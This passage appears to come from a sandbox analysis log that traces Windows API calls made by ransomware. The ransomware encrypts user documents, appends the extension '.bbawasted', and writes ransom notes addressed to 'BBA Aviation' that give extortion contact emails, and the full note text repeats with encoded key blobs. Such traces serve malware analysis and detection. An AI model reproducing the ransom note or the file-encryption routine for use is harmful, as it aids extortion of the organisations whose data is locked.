PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gGKyVcm2NQaBGc0rNy5XN7tOph3Ac+qc9h0ZGCBXJMvPxIzsO4VAXzXnof4/G9RS\r\nYsmjn9Teu2xsIBvnqkYX8gJGqxoYYlF2P1I/ZvATJdkjw9DnDh7BRrmBc+m407F2\r\nbhxmS8UCqturUmL92wT7jtJ5GSJvqxGt/HbQPEdwO2E+pzdUzSlDj2xc49TiWI0F\r\nvmZgOMJnnuV6bYz8jtv9ITwmLSGdFjLvQ9xZHCk0P6psNs8AllvWx4R3MPFuA30T\r\nxT4AqpfKtHaUmkjMU6FUCTmwZqKtAjLqV3BVmy5hKh1DUoCW1M7yhipBOAnABRGq\r\nWJOdrJW/MhpgjLV4To6UIEYCRq2KO9lR2kqDDFJFp1lxLfnvIJmv/vhAqxK98MOQ\r\n7suj6XgCraz0UjFBqSkDvAuCQluyMLfbug6o7g++gvK8nYDSmBpZlgUubO7qe+Bz\r\n6MfpxXYyNRDe2xtaV/8XFHIaqJiq6Wbo+YtSIq3IvMp0Vf6ao4Va6a7dQ60TPVX2\r\nBJC2So1rdE74BI+8jr/lGoOHxUsZyG3x8rqxPJD3INciLtSrW3njqsZ10NaHh9ln\r\nfCtGccwMVhyZpnV+frKhOpk9nPalEF6ycmjVMoTm20njwqDl+vhOMgDbv1JMruHH\r\nH8atG4+W/JAVTaI/MTYvDhyYdALzuGKI4I5C0zd2wL5=[end_key]\r\nKEEP IT\r\n") returned 984 [0212.719] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0212.719] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0212.720] SetEndOfFile (hFile=0x290) returned 1 [0212.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0212.809] CloseHandle (hObject=0x290) returned 1 [0212.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0212.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0ee8 | out: hHeap=0x660000) returned 1 [0212.817] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6790) returned 1 [0212.821] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0212.821] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0212.821] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ac27.ods") returned 38 [0212.822] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6adb18 [0212.822] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.822] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0212.822] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6d68) returned 1 [0212.823] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0212.823] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0212.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ac27.ods.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ac27.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0213.364] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0213.365] SetEndOfFile (hFile=0x290) returned 1 [0213.365] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0213.365] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0213.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ac27.ods" (normalized: "c:\\users\\fd1hvy\\documents\\ac27.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ac27.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ac27.ods.bbawasted")) returned 1 [0213.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Ac27.ods.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ac27.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0213.367] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0213.367] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xd8d8 [0213.367] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd8d8) returned 0x5f0000 [0213.367] CloseHandle (hObject=0x294) returned 1 [0213.373] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0213.373] CloseHandle (hObject=0x28c) returned 1 [0213.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0213.373] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0213.374] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0213.374] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0213.374] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5e88) returned 1 [0213.375] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0213.375] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0213.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0213.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0213.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0213.384] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]OGgrVrLfW7bwLy4vvca2ec+wm+qLqernqUhqk8y2byPfflvfhqCFP3jKJ+z1pHxU\r\njf9qFiOpThLPqPuHtVa8YB9EGpYQro6zN7ZpVskiudvzS8c49U8teBo3jVl5XcGZ\r\nUg7Ai0J0iNx77zHbrcscmyNGKCLFEM68nC3/NOdOhAJdCQ9tVOn9evLTsOOaQwsd\r\nBaWYAgKzwi1gi3iGRopIk2t5wWONF5AkYC2NKUcOcRBg8pemGZFg+3qpPHbLGi9G\r\nu5bntrMHaBlUDcgz/JlOm6nkP/+TZOmuwYWGl+t0333dgeGxAo/hC3NYkbmeCU3t\r\nGTytFPJ/JlVjVrVKp0K2OCZJuU6Zy9jXISnaHO7oMUd6zEYT74gm1wgSp7h25UHF\r\nUja6pr1RXrsR0zjBfaG92TLY9Xjg3OtHOmuvDpZdnmDTXCiaz0RIYSLORM6WB0my\r\nKF0JewgJR9uoMYZdIr9SMExMQWtjbcawx94VRAG5GC9iZaeNN6E/7lslUqIQiBQf\r\nm8c6hIsnmN+YxJD8trhhj5+we9WRMAbCbxv8oHVMTtgrdrxr/TcgO/iq5zZ2Of59\r\n1eEe0P6X9YZiG9rltPecol4V3743dbQvNLvQD7fqyIVYFsjmMNK8ShIMiCeeHsHv\r\n0wVJJkNqvyxCYgiaTM4M1DKNJICBIrtRtMsuftjKYFT=[end_key]\r\nKEEP IT\r\n") returned 984 [0213.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0213.385] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0213.385] SetEndOfFile (hFile=0x290) returned 1 [0213.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0213.387] CloseHandle (hObject=0x290) returned 1 [0213.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0213.691] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3ce0 | out: hHeap=0x660000) returned 1 [0213.691] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a62c8) returned 1 [0213.693] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0213.693] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0213.693] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\B9YL08hWdEn.odt") returned 45 [0213.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6adb18 [0213.693] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0213.693] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.694] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5e88) returned 1 [0213.694] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0213.694] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0213.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\B9YL08hWdEn.odt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\b9yl08hwden.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0213.700] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0213.701] SetEndOfFile (hFile=0x290) returned 1 [0213.702] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.702] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0213.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\B9YL08hWdEn.odt" (normalized: "c:\\users\\fd1hvy\\documents\\b9yl08hwden.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\B9YL08hWdEn.odt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\b9yl08hwden.odt.bbawasted")) returned 1 [0213.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\B9YL08hWdEn.odt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\b9yl08hwden.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0213.737] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0213.737] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x9ee8 [0213.738] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ee8) returned 0x5f0000 [0213.738] CloseHandle (hObject=0x28c) returned 1 [0213.745] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0213.745] CloseHandle (hObject=0x27c) returned 1 [0213.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0213.745] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0213.746] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0213.746] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0213.746] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6130) returned 1 [0213.747] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0213.747] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0213.758] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0213.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0213.759] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.759] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JS9bbuuc9zTFglBTP0aasHxXFC5THPApLD2+XBSGsmZbs1mF5GxQwtd0GYqZJ4ak\r\n/hqT36OZfpo1A/cZJTSaSMyyX7e/bwZe3uL8mynhVDlvxA5cv10otJTUJ4vLA3xw\r\n8fxzLddx3pc3gEWn1tKXpRvkOQ7z9YO4aYjfxJtLbfdAG9D7x3KDX9YINohk4XLB\r\nu9kpKIczLk9mbEo9K/ys5LkY86t05N6H9X5CGusXgTR7X18y/DdiTI/duhD4dQ0q\r\nKmtQYFx2nSANiscDXFYM1ZI4fA3xBfuZTAwY2gNiIScq2nWpHQIrTJX8BD5cqS+G\r\nZM0efs12iK7Q1D7zV9+qniLh/uCjnqVTcBvQu+f9GVjEc0FU5GrUobB9T/kVIUGQ\r\nnxNNRdl5VjX6KoWkGpcOrMq/J6cED8+qa2pELuFghhrFnEjHPkQDkt7nRXogk9Xz\r\nj79+/yig+wroMz7bbqIM10/DU2ZgJMRc0VNyEYfYLJb4VK58fiLZSUPAkg3vlWkZ\r\nhC3KssKi9Ck7q/zFuxh+g8f5JoFjOJlumglZusv/3o8J9xdSnvoStcKiaHMKovC4\r\n45TMgy+fvU/hPG/Pa9JNX1mNnB3IptThsP07aJPSO/uhJx+RLqJ4UsyynALtYjqW\r\nzlVwMAlhnrlp6hqjJzzuvoHUFXUuhu8eQD3BvBHCuG7=[end_key]\r\nKEEP IT\r\n") returned 984 [0213.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0213.759] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0213.759] SetEndOfFile (hFile=0x290) returned 1 [0213.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.762] CloseHandle (hObject=0x290) returned 1 [0213.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0213.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afd18 | out: hHeap=0x660000) returned 1 [0213.769] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6790) returned 1 [0213.769] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0213.769] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0213.957] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned 45 [0213.957] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6adb18 [0213.957] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0213.957] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0213.957] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0213.958] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0213.958] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0213.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0213.959] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0213.960] SetEndOfFile (hFile=0x28c) returned 1 [0213.960] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.960] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0213.960] lstrcpyW (in: lpString1=0x6adb72, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0213.960] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.bbawasted")) returned 1 [0213.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0213.992] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0213.993] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x55000 [0213.993] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x55000) returned 0x1480000 [0213.993] CloseHandle (hObject=0x27c) returned 1 [0214.037] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0214.039] CloseHandle (hObject=0x288) returned 1 [0214.039] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0214.039] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5e88) returned 1 [0214.040] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0214.040] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0214.040] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0214.041] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0214.041] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0214.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0214.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0214.050] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0214.050] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Hre2PgG/KYWt0iAowsyqMgb5eeXPIW+M+5aeT9SdR7hK/DYXjez+eWXNycz0xRNB\r\nypI9QO97uSIuN7gETY14BEEfMDro3MZz8UizebNCh8gr5/msWOMJvUOkH7tb88dT\r\nLMwIkrxLeI6vsazaB+3Wn5vBxZYhL8No6FIwINWnxg4xW0SfdI7doSzydWAi6ipM\r\n9z9L/Vi/FeiXSl/hhFt+RkNtOUKowpbXxQSkaGzumPFfk3INRuPPZQ+qHgn7qRew\r\nyA3ZfcoBKjt9t5G2R0h9Z6HxjxoYK7IyNggFQ8wpIPtsvYvtiszrDPNobF+PXCcU\r\noxHGt/8JaQOIpzgh8S9cyGGQr2GV5wVV+brVGiDMp/alPuQ2bVoYP7QBuvcaN8fq\r\nobcOTUzfCY15fvBMpejTTh2JpTsqxaNWl3j5Stax6H31f3jM8HQaphvDUnOQRgg8\r\noosSskrz1C0wSEieA4XqWSdooAB0HKXLcC3MQMphZPA7rw7WOXb8XOUlIBN/bNgT\r\nVhCYPHPqjwKJIBMmqJLuyLyei0ZpZEKfYHeZk4g8RVn4N7c2iuzb5tMC7qypQXKm\r\nADwZQDvVJM4VPhiFcw2pw1z79P+L9N6QO1Tgk6id22MzVZ/j6R155+xHjAsMDtRR\r\nqonZjzrlh0kgX3EAB3DqO5H7iHT/EVAmYiQWe7gz9lU=[end_key]\r\nKEEP IT\r\n") returned 984 [0214.050] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0214.050] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0214.051] SetEndOfFile (hFile=0x28c) returned 1 [0214.758] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0214.758] CloseHandle (hObject=0x28c) returned 1 [0214.760] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0214.760] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af810 | out: hHeap=0x660000) returned 1 [0214.760] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0214.761] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0214.761] CryptReleaseContext 